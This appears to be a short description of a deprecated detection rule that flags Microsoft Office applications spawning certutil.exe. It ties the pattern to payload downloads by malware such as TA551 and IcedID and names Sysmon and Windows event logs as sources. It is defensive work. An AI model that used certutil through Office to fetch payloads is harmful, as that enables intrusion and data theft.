This detection rule focuses on the behavior of Microsoft Office products that spawn `certutil.exe`, which is commonly associated with malicious activities such as downloading payloads from remote URLs. The use of `certutil.exe` in association with Office applications indicates potential compromises, as malware families like TA551 and IcedID utilize this technique to execute commands that lead to unauthorized access, data exfiltration, or further system compromises. The rule leverages various telemetry sources including Sysmon event logs and Windows event logs to track these process relationships and command-line executions. As this analytic has been deprecated in favor of a more general detection rule, its importance lies in highlighting the malicious use of legitimate tools in the context of Office products, urging timely investigation and response to any detections.